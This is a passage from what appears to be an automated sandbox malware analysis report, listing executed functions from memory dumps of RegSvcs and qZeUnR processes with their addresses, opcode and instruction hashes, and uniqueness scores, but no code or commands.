                                                            • Instruction Fuzzy Hash: E7018FB5B101121BEB75D5AC985176B6BDAEBC9714F148839F90ACB380EE25DC434391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B03D3A Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d01dfd8a6bd00c52fc88530a7d3b1b635e0ff64ef1ab6377836038e64ec5ea0
                                                            • Instruction ID: 1ae84033e9204353ced35564abeb0fb6576a5f3118d1dc3cf4b6a9883611b699
                                                            • Opcode Fuzzy Hash: 8d01dfd8a6bd00c52fc88530a7d3b1b635e0ff64ef1ab6377836038e64ec5ea0
                                                            • Instruction Fuzzy Hash: 3C21E0B1C01259AFDB00CF9AD884ACEFFB8FB49610F10826AE918A7240C374A554CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0310C Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cc07a964cce338cf088faa42fce3125a0d36fc5eb73bd6032df847c2b552f1e
                                                            • Instruction ID: bb66afd90a91b8d42e10806ac370799debbef88bb6d5e4278ecbba32d1b8d2a4
                                                            • Opcode Fuzzy Hash: 6cc07a964cce338cf088faa42fce3125a0d36fc5eb73bd6032df847c2b552f1e
                                                            • Instruction Fuzzy Hash: C421E3B1D00659EFDB00CF9AD884ADEFFF4FB48710F10816AE918A7240C374A954CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0A3C2 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e87f4009215edaf8e11b9e020aaa711f4b142952b33318f8d1af30c4bd71f58e
                                                            • Instruction ID: a91577cf65b4c0b58ab5fe44079b0a54dbe6f54c30d3b7d11b1f48268b6111c9
                                                            • Opcode Fuzzy Hash: e87f4009215edaf8e11b9e020aaa711f4b142952b33318f8d1af30c4bd71f58e
                                                            • Instruction Fuzzy Hash: 66014C70B013112FEBA1973CE81075E7FD5FB89714F104869E50ACB392DE24DC424381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0406F Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a3875a63038d50ceb92009f587067043ba2452da7d541f853948f4957ef7872
                                                            • Instruction ID: 7e9950fedddcf0e15a2e634c44eb62baabbb40664a56317ce38ab726f758175c
                                                            • Opcode Fuzzy Hash: 0a3875a63038d50ceb92009f587067043ba2452da7d541f853948f4957ef7872
                                                            • Instruction Fuzzy Hash: 2B01D472B111199BEB54AAA8DC106AF7BEEEBC9311F0001B5D606E7284FE658C124BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B042C8 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4d953261950958c243a21ab7c73c1de94af84e3ff6873b207a59a5e8eeefa1c1
                                                            • Instruction ID: 8be5b813156fa899514c0a33f7d9244d89b46ef6c870a75251b3fc028241b2a3
                                                            • Opcode Fuzzy Hash: 4d953261950958c243a21ab7c73c1de94af84e3ff6873b207a59a5e8eeefa1c1
                                                            • Instruction Fuzzy Hash: 8C01D170B100119BEB74A57DD81476FBBDAEBC9710F148839E20AC7384ED65EC024381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0F258 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e04ff2039dbac6887f37836631bedf563f3ccd30a187e72134fea7fa2667e50
                                                            • Instruction ID: cb19c305387f3855aacb3f039fab1c33b10fe55e239ce8f24203f5c8fff463e5
                                                            • Opcode Fuzzy Hash: 9e04ff2039dbac6887f37836631bedf563f3ccd30a187e72134fea7fa2667e50
                                                            • Instruction Fuzzy Hash: 9A01AD74B100121BEB75E5AC946073A6BDAEBC9614F148839E50AC7380EE25DC024381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0A3D0 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5b98f106740c6fa70c8e16987e205c419413f1ba3bd7999b18f19dd87170ad5
                                                            • Instruction ID: f7fb60b20655098f34885a3191413ea3fcd902539183e70458fa4b7df4c442bf
                                                            • Opcode Fuzzy Hash: a5b98f106740c6fa70c8e16987e205c419413f1ba3bd7999b18f19dd87170ad5
                                                            • Instruction Fuzzy Hash: EB018674B002155FEBA1E67CE454B2E7BD5E789714F105828E10AC7391DE25DC424781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B08390 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5017a1ccdd44d7adcda803aeb106a2417326a3dfbcab7fd0f5e7d9c77892fb18
                                                            • Instruction ID: b448a7f63b887d6009a9be64012e275d20590fd1314d19cf39d27d25e091b439
                                                            • Opcode Fuzzy Hash: 5017a1ccdd44d7adcda803aeb106a2417326a3dfbcab7fd0f5e7d9c77892fb18
                                                            • Instruction Fuzzy Hash: 8CF0AFB1B00201EFFF658E58EA8127D7F68EB88314F1450B6E905CB2A1D635DE02CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B06530 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b14d314a4916b444bdccf3cbe48dab881af69bf6d0f9132f87de27d4d2e75028
                                                            • Instruction ID: cb184cf1f660a3175d95457746eb1c57c8061e768f77653d0abb45cece9328a0
                                                            • Opcode Fuzzy Hash: b14d314a4916b444bdccf3cbe48dab881af69bf6d0f9132f87de27d4d2e75028
                                                            • Instruction Fuzzy Hash: 96E0D8B1D1520CBFEB60DE74898579E7FADEB02208F2084E4D408CB143F577D9A18790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Function 00D31340 Relevance: .5, Instructions: 525COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66f0c299d086c0e48f10574faec078b1f133f3f26fae86c0358933473ca15d84
                                                            • Instruction ID: 50d72368f73f4a15359bdd8acc5e03c093e5a598396890d9618e5c3a5d00c51a
                                                            • Opcode Fuzzy Hash: 66f0c299d086c0e48f10574faec078b1f133f3f26fae86c0358933473ca15d84
                                                            • Instruction Fuzzy Hash: 87221838701702CFDB18EB74E89476A77A2FB89305F248929C4568B398DB35EC87CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D30BC0 Relevance: .3, Instructions: 338COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e706ad97fd88ca531f0a05e9d333660903be1a003955040249f2557d378c6102
                                                            • Instruction ID: e3685ab8ede44bdf422c3c99e5ea9479d0fea3cc87b3cb5e225e95f67e14d88c
                                                            • Opcode Fuzzy Hash: e706ad97fd88ca531f0a05e9d333660903be1a003955040249f2557d378c6102
                                                            • Instruction Fuzzy Hash: B881D235A00341CFCB199BB4D8687AEBBF2EF89310F18856AD406577A4DF31AC86CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D31230 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e69152f46ae83076d7895a9cd4c3e36ab356c0f85e653a21b0e5a91f2c5adaa
                                                            • Instruction ID: 300bcb3eaf8fb46441e8adb1f19cdc3c14c15c6e7993e960c177de3be2907d74
                                                            • Opcode Fuzzy Hash: 7e69152f46ae83076d7895a9cd4c3e36ab356c0f85e653a21b0e5a91f2c5adaa
                                                            • Instruction Fuzzy Hash: 44311734701251CFC759AB38D8A891D7BF2AF8A71536508B8E506CF772DA36DC82CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D31240 Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6c7d45bad75b167a96cd42740f40d31da1f6dcf264a3f7063b8c0e628e61fb2
                                                            • Instruction ID: f0d34a8b44107a32197811ea3d4b3ff92240aeab0c78e60ae004a6bcaaaf2ea0
                                                            • Opcode Fuzzy Hash: d6c7d45bad75b167a96cd42740f40d31da1f6dcf264a3f7063b8c0e628e61fb2
                                                            • Instruction Fuzzy Hash: 2521E335701211CFC759AB79C49891D77F2AF8A71636508B8E906CF772DA36DC82CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D31AE0 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f9d9abd9b2e9970ca83068e38137efd7481f1dbc2a5dfd68a400f09cf799de5
                                                            • Instruction ID: 88789bae3f2bc3df55be522612f9f843a6d9980526fa96631d101256ad1648c3
                                                            • Opcode Fuzzy Hash: 5f9d9abd9b2e9970ca83068e38137efd7481f1dbc2a5dfd68a400f09cf799de5
                                                            • Instruction Fuzzy Hash: 97118E35B002049FC705EBB8E45079D7BF6EF86304F1044A9D60AAB3A5EF749D0B8B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D31C00 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4afed5d86a1606456dc5e5e76391d3b3ccd3086ff63138d0ee6d851d07d19891
                                                            • Instruction ID: bf077f03bd231958b07b848f98e0cbac553db314ab43b517717ffd0f810ab979
                                                            • Opcode Fuzzy Hash: 4afed5d86a1606456dc5e5e76391d3b3ccd3086ff63138d0ee6d851d07d19891
                                                            • Instruction Fuzzy Hash: 3011C236E002469FCB01EFB4C8449DABBB1FF8930071085A6E505A7261E730A806CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D31C10 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d30ae7640b36b87e5074420fd201540e1075a053decb6f2afb7de6f6f27b6af
                                                            • Instruction ID: 9f19df7cc3a85b0f73478ef9ceffa610a070902cb7ecdba9cecd700b4c3b1d75
                                                            • Opcode Fuzzy Hash: 5d30ae7640b36b87e5074420fd201540e1075a053decb6f2afb7de6f6f27b6af
                                                            • Instruction Fuzzy Hash: 8001B136E00206DFCB04EFB4D84499FFBF5FF88300710866AE515A7224E770A902CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D30880 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 067f2989ca14e9101136e6df3795a3a2b2bcbcc90db9574f1d86e6d3ead89023
                                                            • Instruction ID: eb93456016d2c91728b4a5a0c1173d6844b0b1e4060e1457379581c244948212
                                                            • Opcode Fuzzy Hash: 067f2989ca14e9101136e6df3795a3a2b2bcbcc90db9574f1d86e6d3ead89023
                                                            • Instruction Fuzzy Hash: F5F06D60A0E3C5AFCB8267B89C251DD7FF4DD47600B1885FBC4C5D7153DA244916C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D30F9D Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a6d0a394a65ecb252ef60ccb94ead6f3c7ecb5f56915a0d2b749b7486d9767c7
                                                            • Instruction ID: 1e2a973836aae4c9c24cd183b58c2bd2e3469a8355dae05353bba5e8ac6d758c
                                                            • Opcode Fuzzy Hash: a6d0a394a65ecb252ef60ccb94ead6f3c7ecb5f56915a0d2b749b7486d9767c7
                                                            • Instruction Fuzzy Hash: 83F03978A00306CFDB24EB78C4687AD7BF0BF48715F240858D502AB3A0CBB48C84CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D308A8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.2230347025.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_d30000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fe2d8c5aef46d6fb774ad07f28e48eef79e8bff4e9c2c80ab11e63079aa856b
                                                            • Instruction ID: 88f04784071e9eb2e317cd1c6a850b1116f35e47c61043b48c72d8f06e6a3fbe
                                                            • Opcode Fuzzy Hash: 2fe2d8c5aef46d6fb774ad07f28e48eef79e8bff4e9c2c80ab11e63079aa856b
                                                            • Instruction Fuzzy Hash: E7D067B1D01219AF8B40EFBD99051DEBBF8FE09251F104566D959E3200E7709A108BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Function 04F41340 Relevance: .6, Instructions: 579COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b3d6aa017b751d3d481f8c916ae888ebd9808713bc5788f30453f62e6f08544
                                                            • Instruction ID: cbb46e270d420bdc33c1634ff47642e6da31f70e227d958283a09e475ae55e24
                                                            • Opcode Fuzzy Hash: 2b3d6aa017b751d3d481f8c916ae888ebd9808713bc5788f30453f62e6f08544
                                                            • Instruction Fuzzy Hash: D6325B34B00206CFDB15EF74DA95A6A77B2FBC9345B108928D4168B399EB35EC83DB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F40BC0 Relevance: .3, Instructions: 339COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bba1710c496316b7f904f431565db863fe78d6d5caf44d20e6fdb44f1da577ce
                                                            • Instruction ID: 522c88e07fe2f8d4f92992dc7144218ddf1e82ffc1ef1f293a66670f4b9b8fcd
                                                            • Opcode Fuzzy Hash: bba1710c496316b7f904f431565db863fe78d6d5caf44d20e6fdb44f1da577ce
                                                            • Instruction Fuzzy Hash: 8281B135E00305CFDB169B70C968BAEBBB2EF88310F158569D502972A5DF75BC86DB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F41230 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d0723d9862800be64b66798a1f3cb32bbde258210a73266a5f56acbcb999f78
                                                            • Instruction ID: 5fd367b9d43a7ab4ab3355956a701d215cfe5e2b7af0aa94620bc5b779249d72
                                                            • Opcode Fuzzy Hash: 7d0723d9862800be64b66798a1f3cb32bbde258210a73266a5f56acbcb999f78
                                                            • Instruction Fuzzy Hash: C2310834741610CFC759AB38D49882D7BF2AF8A71536108B8E506CF772DA36DC82CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F41240 Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73a78f8b2591e65a80dcc33d11747794ff1406cabda22496adde3d78e5943f68
                                                            • Instruction ID: e15b9abadc6d820b09e35d5d250e4a940352104f69f65e2bd5e174858f9bfb8e
                                                            • Opcode Fuzzy Hash: 73a78f8b2591e65a80dcc33d11747794ff1406cabda22496adde3d78e5943f68
                                                            • Instruction Fuzzy Hash: 4D21C235741211CFC759AB79C49892D77B2AF8A71636108B8E906CF772DA36DC82CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F41C00 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13e89bd951856d795bb307716b70121fd3b45ddebfdb1b074112336cfe4ecc9c
                                                            • Instruction ID: 61552535c3ebaec2f81eaf8cd50e5bbcfde8ee67df2a97b0b82e9f12f0df181c
                                                            • Opcode Fuzzy Hash: 13e89bd951856d795bb307716b70121fd3b45ddebfdb1b074112336cfe4ecc9c
                                                            • Instruction Fuzzy Hash: 9911A176E002458FCB01EFB4D8819DEFBB1FF9930071186AAE51597265E7709907CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F41C10 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba17cc095f68d28ffd8086391ede57557a37ba9d294694b66ca36320c673e784
                                                            • Instruction ID: b22ec1d5c5e7de537d553045a027927e030669489c89579d4300662ff8ad4e38
                                                            • Opcode Fuzzy Hash: ba17cc095f68d28ffd8086391ede57557a37ba9d294694b66ca36320c673e784
                                                            • Instruction Fuzzy Hash: E301B176E002069FCB00EFB4D84499FFBF5FFC8300710866AE51597224EB70A902CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F40880 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8307cee8cea6117f1b80532fd67ae3d05fff3dd05e772e72fcd04e6d1b4c62b9
                                                            • Instruction ID: a68bfabd3398d4a064085ba9cecc7fbdde6b15c556a360396be026be87360030
                                                            • Opcode Fuzzy Hash: 8307cee8cea6117f1b80532fd67ae3d05fff3dd05e772e72fcd04e6d1b4c62b9
                                                            • Instruction Fuzzy Hash: E7F05EB0D0F3896FDB0297B49E530DEBFB0AD46640B0A44EBD4C9E7153E124491BCBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F40F9D Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb9bb2dccd3103f8d821a8060296c9dd7c42100bc034d4474c11a21220689412
                                                            • Instruction ID: 1810871cc56c515520958dd44e52f653a0c272e06e7c257d2ee4fd6fa0e13b9b
                                                            • Opcode Fuzzy Hash: bb9bb2dccd3103f8d821a8060296c9dd7c42100bc034d4474c11a21220689412
                                                            • Instruction Fuzzy Hash: F8F01C75A00309CFDB14DB74C66DB9D7BB0AB88714F250858D402A7261DB74A885DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F41AE0 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d32266a371c750fae765e8f4f3a12fdb75663191b6260586653b6ad49a1e5ee
                                                            • Instruction ID: 7aefbb97fab762686fed943b6d12cb81f01ea46f926fc4b3aa380dbb5ef92860
                                                            • Opcode Fuzzy Hash: 8d32266a371c750fae765e8f4f3a12fdb75663191b6260586653b6ad49a1e5ee
                                                            • Instruction Fuzzy Hash: 30D05B357002149FC710EB75EE49E453B78EF49711F504095E504CB2A0EB72EC15C7D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04F408A8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000014.00000002.2314019424.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_20_2_4f40000_qZeUnR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0852acb0ce490ae8c6ba95f79b793678783ca8dfcdc8c447b15fb12b0ebde03
                                                            • Instruction ID: b1e326a9fc47e9d1e6ba6580ddbf47975529fda08209899dde1cd4acc44c6f88
                                                            • Opcode Fuzzy Hash: d0852acb0ce490ae8c6ba95f79b793678783ca8dfcdc8c447b15fb12b0ebde03
                                                            • Instruction Fuzzy Hash: 94D067B1D0121DAF8B40EFB99A055DEBBF8FE49250B114566D919E3200F6705A149BD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%